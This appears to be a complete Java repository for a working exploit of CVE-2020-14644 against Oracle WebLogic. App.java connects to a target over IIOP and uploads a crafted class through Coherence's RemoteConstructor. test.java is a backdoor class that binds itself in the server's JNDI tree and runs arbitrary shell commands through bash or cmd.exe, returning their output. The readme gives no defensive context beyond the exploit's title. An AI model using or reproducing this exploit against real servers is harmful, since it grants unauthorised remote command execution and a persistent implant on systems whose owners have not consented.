├── .idea
    ├── $CACHE_FILE$
    ├── .gitignore
    ├── artifacts
    │   └── cve_2020_14644_jar.xml
    ├── compiler.xml
    ├── encodings.xml
    ├── jarRepositories.xml
    ├── libraries
    │   ├── coherence.xml
    │   └── wlfullclient.xml
    └── misc.xml
├── cve_2020_14644.iml
├── libs
    ├── coherence.jar
    └── wlfullclient.jar
├── pom.xml
├── readme.md
└── src
    ├── META-INF
        └── MANIFEST.MF
    ├── main
        └── java
        │   └── org
        │       └── unicodesec
        │           ├── App.java
        │           ├── Serializables.java
        │           └── test.java
    └── test
        └── java
            └── org
                └── unicodesec
                    └── AppTest.java


/.idea/$CACHE_FILE$:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="ProjectInspectionProfilesVisibleTreeState">
 4 |     <entry key="Project Default">
 5 |       <profile-state>
 6 |         <expanded-state>
 7 |           <State />
 8 |           <State>
 9 |             <id>Android</id>
10 |           </State>
11 |           <State>
12 |             <id>CDI (Contexts and Dependency Injection)</id>
13 |           </State>
14 |           <State>
15 |             <id>CodeSpring CoreSpring</id>
16 |           </State>
17 |           <State>
18 |             <id>EncapsulationJava</id>
19 |           </State>
20 |           <State>
21 |             <id>Java</id>
22 |           </State>
23 |           <State>
24 |             <id>LintAndroid</id>
25 |           </State>
26 |           <State>
27 |             <id>SecurityLintAndroid</id>
28 |           </State>
29 |           <State>
30 |             <id>Spring</id>
31 |           </State>
32 |           <State>
33 |             <id>Spring AOPSpring</id>
34 |           </State>
35 |           <State>
36 |             <id>Spring CoreSpring</id>
37 |           </State>
38 |         </expanded-state>
39 |         <selected-state>
40 |           <State>
41 |             <id>Android</id>
42 |           </State>
43 |         </selected-state>
44 |       </profile-state>
45 |     </entry>
46 |   </component>
47 | </project>


--------------------------------------------------------------------------------
/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Datasource local storage ignored files
5 | /dataSources/
6 | /dataSources.local.xml
7 | # Editor-based HTTP Client requests
8 | /httpRequests/
9 | 


--------------------------------------------------------------------------------
/.idea/artifacts/cve_2020_14644_jar.xml:
--------------------------------------------------------------------------------
 1 | <component name="ArtifactManager">
 2 |   <artifact type="jar" name="cve_2020_14644:jar">
 3 |     <output-path>$PROJECT_DIR$/out/artifacts/cve_2020_14644_jar</output-path>
 4 |     <root id="archive" name="cve_2020_14644.jar">
 5 |       <element id="directory" name="META-INF">
 6 |         <element id="file-copy" path="$PROJECT_DIR$/src/META-INF/MANIFEST.MF" />
 7 |       </element>
 8 |       <element id="module-output" name="cve_2020_14644" />
 9 |       <element id="extracted-dir" path="$PROJECT_DIR$/libs/coherence.jar" path-in-jar="/" />
10 |       <element id="extracted-dir" path="$PROJECT_DIR$/libs/wlfullclient.jar" path-in-jar="/" />
11 |       <element id="extracted-dir" path="$MAVEN_REPOSITORY$/javassist/javassist/3.12.1.GA/javassist-3.12.1.GA.jar" path-in-jar="/" />
12 |     </root>
13 |   </artifact>
14 | </component>


--------------------------------------------------------------------------------
/.idea/compiler.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="CompilerConfiguration">
 4 |     <annotationProcessing>
 5 |       <profile name="Maven default annotation processors profile" enabled="true">
 6 |         <sourceOutputDir name="target/generated-sources/annotations" />
 7 |         <sourceTestOutputDir name="target/generated-test-sources/test-annotations" />
 8 |         <outputRelativeToContentRoot value="true" />
 9 |         <module name="cve_2020_14644" />
10 |       </profile>
11 |     </annotationProcessing>
12 |   </component>
13 | </project>


--------------------------------------------------------------------------------
/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <project version="4">
3 |   <component name="Encoding">
4 |     <file url="file://$PROJECT_DIR$/src/main/java" charset="UTF-8" />
5 |   </component>
6 | </project>


--------------------------------------------------------------------------------
/.idea/jarRepositories.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="RemoteRepositoriesConfiguration">
 4 |     <remote-repository>
 5 |       <option name="id" value="central" />
 6 |       <option name="name" value="Maven Central repository" />
 7 |       <option name="url" value="https://repo1.maven.org/maven2" />
 8 |     </remote-repository>
 9 |     <remote-repository>
10 |       <option name="id" value="jboss.community" />
11 |       <option name="name" value="JBoss Community repository" />
12 |       <option name="url" value="https://repository.jboss.org/nexus/content/repositories/public/" />
13 |     </remote-repository>
14 |     <remote-repository>
15 |       <option name="id" value="central" />
16 |       <option name="name" value="Central Repository" />
17 |       <option name="url" value="https://maven.aliyun.com/repository/public" />
18 |     </remote-repository>
19 |   </component>
20 | </project>


--------------------------------------------------------------------------------
/.idea/libraries/coherence.xml:
--------------------------------------------------------------------------------
1 | <component name="libraryTable">
2 |   <library name="coherence">
3 |     <CLASSES>
4 |       <root url="jar://$PROJECT_DIR$/libs/coherence.jar!/" />
5 |     </CLASSES>
6 |     <JAVADOC />
7 |     <SOURCES />
8 |   </library>
9 | </component>


--------------------------------------------------------------------------------
/.idea/libraries/wlfullclient.xml:
--------------------------------------------------------------------------------
 1 | <component name="libraryTable">
 2 |   <library name="wlfullclient">
 3 |     <CLASSES>
 4 |       <root url="jar://$PROJECT_DIR$/libs/wlfullclient.jar!/" />
 5 |     </CLASSES>
 6 |     <JAVADOC />
 7 |     <SOURCES>
 8 |       <root url="jar://$PROJECT_DIR$/libs/wlfullclient.jar!/" />
 9 |     </SOURCES>
10 |   </library>
11 | </component>


--------------------------------------------------------------------------------
/.idea/misc.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | <project version="4">
 3 |   <component name="ASMPluginConfiguration">
 4 |     <asm skipDebug="false" skipFrames="false" skipCode="false" expandFrames="false" />
 5 |     <groovy codeStyle="LEGACY" />
 6 |   </component>
 7 |   <component name="ExternalStorageConfigurationManager" enabled="true" />
 8 |   <component name="MavenProjectsManager">
 9 |     <option name="originalFiles">
10 |       <list>
11 |         <option value="$PROJECT_DIR$/pom.xml" />
12 |       </list>
13 |     </option>
14 |   </component>
15 |   <component name="ProjectRootManager" version="2" languageLevel="JDK_1_8" project-jdk-name="1.8" project-jdk-type="JavaSDK">
16 |     <output url="file://$PROJECT_DIR$/out" />
17 |   </component>
18 | </project>


--------------------------------------------------------------------------------
/cve_2020_14644.iml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <module type="JAVA_MODULE" version="4" />


--------------------------------------------------------------------------------
/libs/coherence.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/potats0/cve_2020_14644/707f9efe1f154787b247f60da805d714a1364c0c/libs/coherence.jar


--------------------------------------------------------------------------------
/libs/wlfullclient.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/potats0/cve_2020_14644/707f9efe1f154787b247f60da805d714a1364c0c/libs/wlfullclient.jar


--------------------------------------------------------------------------------
/pom.xml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | 
 3 | <project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
 4 |   xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
 5 |   <modelVersion>4.0.0</modelVersion>
 6 | 
 7 |   <groupId>org.unicodesec</groupId>
 8 |   <artifactId>cve_2020_14644</artifactId>
 9 |   <version>1.0-SNAPSHOT</version>
10 | 
11 |   <name>cve_2020_14644</name>
12 |   <!-- FIXME change it to the project's website -->
13 |   <url>http://www.example.com</url>
14 | 
15 |   <properties>
16 |     <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
17 |     <maven.compiler.source>1.7</maven.compiler.source>
18 |     <maven.compiler.target>1.7</maven.compiler.target>
19 |   </properties>
20 | 
21 |   <dependencies>
22 |     <dependency>
23 |       <groupId>junit</groupId>
24 |       <artifactId>junit</artifactId>
25 |       <version>4.11</version>
26 |       <scope>test</scope>
27 |     </dependency>
28 |     <!-- https://mvnrepository.com/artifact/javassist/javassist -->
29 |     <dependency>
30 |       <groupId>javassist</groupId>
31 |       <artifactId>javassist</artifactId>
32 |       <version>3.12.1.GA</version>
33 |     </dependency>
34 | 
35 |   </dependencies>
36 | 
37 |   <build>
38 |     <pluginManagement><!-- lock down plugins versions to avoid using Maven defaults (may be moved to parent pom) -->
39 |       <plugins>
40 |         <!-- clean lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#clean_Lifecycle -->
41 |         <plugin>
42 |           <artifactId>maven-clean-plugin</artifactId>
43 |           <version>3.1.0</version>
44 |         </plugin>
45 |         <!-- default lifecycle, jar packaging: see https://maven.apache.org/ref/current/maven-core/default-bindings.html#Plugin_bindings_for_jar_packaging -->
46 |         <plugin>
47 |           <artifactId>maven-resources-plugin</artifactId>
48 |           <version>3.0.2</version>
49 |         </plugin>
50 |         <plugin>
51 |           <artifactId>maven-compiler-plugin</artifactId>
52 |           <version>3.8.0</version>
53 |         </plugin>
54 |         <plugin>
55 |           <artifactId>maven-surefire-plugin</artifactId>
56 |           <version>2.22.1</version>
57 |         </plugin>
58 |         <plugin>
59 |           <artifactId>maven-jar-plugin</artifactId>
60 |           <version>3.0.2</version>
61 |         </plugin>
62 |         <plugin>
63 |           <artifactId>maven-install-plugin</artifactId>
64 |           <version>2.5.2</version>
65 |         </plugin>
66 |         <plugin>
67 |           <artifactId>maven-deploy-plugin</artifactId>
68 |           <version>2.8.2</version>
69 |         </plugin>
70 |         <!-- site lifecycle, see https://maven.apache.org/ref/current/maven-core/lifecycles.html#site_Lifecycle -->
71 |         <plugin>
72 |           <artifactId>maven-site-plugin</artifactId>
73 |           <version>3.7.1</version>
74 |         </plugin>
75 |         <plugin>
76 |           <artifactId>maven-project-info-reports-plugin</artifactId>
77 |           <version>3.0.0</version>
78 |         </plugin>
79 |       </plugins>
80 |     </pluginManagement>
81 |   </build>
82 | </project>
83 | 


--------------------------------------------------------------------------------
/readme.md:
--------------------------------------------------------------------------------
1 | ## cve-2020-14644 exploit
2 | 
3 | ## 欢迎关注 宽字节安全 公众号
4 | ![](https://potatso-1253210846.cos.ap-beijing.myqcloud.com//imgWeChat%20Image_20200612150038.png)


--------------------------------------------------------------------------------
/src/META-INF/MANIFEST.MF:
--------------------------------------------------------------------------------
1 | Manifest-Version: 1.0
2 | Main-Class: org.unicodesec.App
3 | 
4 | 


--------------------------------------------------------------------------------
/src/main/java/org/unicodesec/App.java:
--------------------------------------------------------------------------------
 1 | package org.unicodesec;
 2 | 
 3 | import com.tangosol.internal.util.invoke.ClassDefinition;
 4 | import com.tangosol.internal.util.invoke.ClassIdentity;
 5 | import com.tangosol.internal.util.invoke.RemoteConstructor;
 6 | import javassist.ClassPool;
 7 | import javassist.CtClass;
 8 | import weblogic.cluster.singleton.ClusterMasterRemote;
 9 | import weblogic.jndi.Environment;
10 | 
11 | import javax.naming.Context;
12 | import javax.naming.NamingException;
13 | import java.rmi.RemoteException;
14 | 
15 | /**
16 |  * created by UnicodeSec potatso
17 |  */
18 | public class App {
19 |     public static void main(String[] args) throws Exception {
20 |         String text = "                   ___   ___ ___   ___        __ __ _  _     __ _  _   _  _                     \n" +
21 |                 "                  |__ \\ / _ \\__ \\ / _ \\      /_ /_ | || |   / /| || | | || |                    \n" +
22 |                 "   _____   _____     ) | | | | ) | | | |______| || | || |_ / /_| || |_| || |_    _____  ___ __  \n" +
23 |                 "  / __\\ \\ / / _ \\   / /| | | |/ /| | | |______| || |__   _| '_ \\__   _|__   _|  / _ \\ \\/ / '_ \\ \n" +
24 |                 " | (__ \\ V /  __/  / /_| |_| / /_| |_| |      | || |  | | | (_) | | |    | |   |  __/>  <| |_) |\n" +
25 |                 "  \\___| \\_/ \\___| |____|\\___/____|\\___/       |_||_|  |_|  \\___/  |_|    |_|    \\___/_/\\_\\ .__/ \n" +
26 |                 "                                                                                         | |    \n" +
27 |                 "                                                                                         |_|    " +
28 |                 "                                                     Powered by UnicodeSec potatso              ";
29 |         System.out.println(text);
30 |         if (args.length<3){
31 |             printUsage();
32 |         }
33 |         String host = args[0];
34 |         String port = args[1];
35 |         String command = args[2];
36 |         Context iiopCtx = getInitialContext(host, port);
37 |         if (getRemoteObj(iiopCtx) == null) {
38 |             ClassIdentity classIdentity = new ClassIdentity(org.unicodesec.test.class);
39 |             ClassPool cp = ClassPool.getDefault();
40 |             CtClass ctClass = cp.get(org.unicodesec.test.class.getName());
41 |             ctClass.replaceClassName(org.unicodesec.test.class.getName(), org.unicodesec.test.class.getName() + "$" + classIdentity.getVersion());
42 |             RemoteConstructor constructor = new RemoteConstructor(
43 |                     new ClassDefinition(classIdentity, ctClass.toBytecode()),
44 |                     new Object[]{}
45 |             );
46 |             String bindName = "UnicodeSec" + System.nanoTime();
47 |             iiopCtx.rebind(bindName, constructor);
48 |         }
49 |         executeCmdFromWLC(command, getRemoteObj(iiopCtx));
50 |     }
51 | 
52 |     private static void printUsage() {
53 |         System.out.println("usage: java -jar cve-2020-14644.jar host port command");
54 |         System.exit(-1);
55 |     }
56 | 
57 |     private static void executeCmdFromWLC(String command, ClusterMasterRemote remoteObj) throws NamingException, RemoteException {
58 |         String response = remoteObj.getServerLocation(command);
59 |         System.out.println(response);
60 |     }
61 | 
62 |     public static Context getInitialContext(String host, String port) throws Exception {
63 |         String url = converUrl(host, port);
64 |         Environment environment = new Environment();
65 |         environment.setProviderUrl(url);
66 |         environment.setEnableServerAffinity(false);
67 |         Context context = environment.getInitialContext();
68 |         return context;
69 |     }
70 | 
71 |     public static String converUrl(String host, String port) {
72 |         return "iiop://" + host + ":" + port;
73 |     }
74 | 
75 |     public static ClusterMasterRemote getRemoteObj(Context ctx){
76 |         try{
77 |             return (ClusterMasterRemote)ctx.lookup("UnicodeSec");
78 |         }catch (Exception e){
79 |             return null;
80 |         }
81 | 
82 |     }
83 | 
84 | }
85 | 


--------------------------------------------------------------------------------
/src/main/java/org/unicodesec/Serializables.java:
--------------------------------------------------------------------------------
 1 | package org.unicodesec;
 2 | 
 3 | import java.io.*;
 4 | 
 5 | public class Serializables {
 6 | 
 7 |     public static byte[] serialize(final Object obj) throws IOException {
 8 |         final ByteArrayOutputStream out = new ByteArrayOutputStream();
 9 |         serialize(obj, out);
10 |         return out.toByteArray();
11 |     }
12 | 
13 |     public static void serialize(final Object obj, final OutputStream out) throws IOException {
14 |         final ObjectOutputStream objOut = new ObjectOutputStream(out);
15 |         objOut.writeObject(obj);
16 |         objOut.flush();
17 |         objOut.close();
18 |     }
19 | 
20 |     public static Object deserialize(final byte[] serialized) throws IOException, ClassNotFoundException {
21 |         final ByteArrayInputStream in = new ByteArrayInputStream(serialized);
22 |         return deserialize(in);
23 |     }
24 | 
25 |     public static Object deserialize(final InputStream in) throws ClassNotFoundException, IOException {
26 |         final ObjectInputStream objIn = new ObjectInputStream(in);
27 |         return objIn.readObject();
28 |     }
29 | 
30 | }


--------------------------------------------------------------------------------
/src/main/java/org/unicodesec/test.java:
--------------------------------------------------------------------------------
 1 | package org.unicodesec;
 2 | 
 3 | import com.tangosol.internal.util.invoke.RemoteConstructor;
 4 | import weblogic.cluster.singleton.ClusterMasterRemote;
 5 | 
 6 | import javax.naming.Context;
 7 | import javax.naming.InitialContext;
 8 | import java.io.BufferedReader;
 9 | import java.io.InputStreamReader;
10 | import java.rmi.RemoteException;
11 | import java.util.ArrayList;
12 | import java.util.List;
13 | 
14 | public class test implements com.tangosol.internal.util.invoke.Remotable, ClusterMasterRemote {
15 | 
16 | 
17 |     static {
18 |         try {
19 |             String bindName = "UnicodeSec";
20 |             Context ctx = new InitialContext();
21 |             test remote = new test();
22 |             ctx.rebind(bindName, remote);
23 |             System.out.println("installed");
24 |         } catch (Exception var1) {
25 |             var1.printStackTrace();
26 |         }
27 |     }
28 | 
29 |     public test() {
30 | 
31 |     }
32 | 
33 |     @Override
34 |     public RemoteConstructor getRemoteConstructor() {
35 |         return null;
36 |     }
37 | 
38 |     @Override
39 |     public void setRemoteConstructor(RemoteConstructor remoteConstructor) {
40 | 
41 |     }
42 | 
43 |     @Override
44 |     public void setServerLocation(String var1, String var2) throws RemoteException {
45 | 
46 |     }
47 | 
48 |     @Override
49 |     public String getServerLocation(String cmd) throws RemoteException {
50 |         try {
51 | 
52 |             boolean isLinux = true;
53 |             String osTyp = System.getProperty("os.name");
54 |             if (osTyp != null && osTyp.toLowerCase().contains("win")) {
55 |                 isLinux = false;
56 |             }
57 |             List<String> cmds = new ArrayList<String>();
58 | 
59 |             if (isLinux) {
60 |                 cmds.add("/bin/bash");
61 |                 cmds.add("-c");
62 |                 cmds.add(cmd);
63 |             } else {
64 |                 cmds.add("cmd.exe");
65 |                 cmds.add("/c");
66 |                 cmds.add(cmd);
67 |             }
68 | 
69 |             ProcessBuilder processBuilder = new ProcessBuilder(cmds);
70 |             processBuilder.redirectErrorStream(true);
71 |             Process proc = processBuilder.start();
72 | 
73 |             BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
74 |             StringBuffer sb = new StringBuffer();
75 | 
76 |             String line;
77 |             while ((line = br.readLine()) != null) {
78 |                 sb.append(line).append("\n");
79 |             }
80 | 
81 |             return sb.toString();
82 |         } catch (Exception e) {
83 |             return e.getMessage();
84 |         }
85 |     }
86 | }
87 | 
88 | 


--------------------------------------------------------------------------------
/src/test/java/org/unicodesec/AppTest.java:
--------------------------------------------------------------------------------
 1 | package org.unicodesec;
 2 | 
 3 | import static org.junit.Assert.assertTrue;
 4 | 
 5 | import org.junit.Test;
 6 | 
 7 | /**
 8 |  * Unit test for simple App.
 9 |  */
10 | public class AppTest 
11 | {
12 |     /**
13 |      * Rigorous Test :-)
14 |      */
15 |     @Test
16 |     public void shouldAnswerWithTrue()
17 |     {
18 |         assertTrue( true );
19 |     }
20 | }
21 | 


--------------------------------------------------------------------------------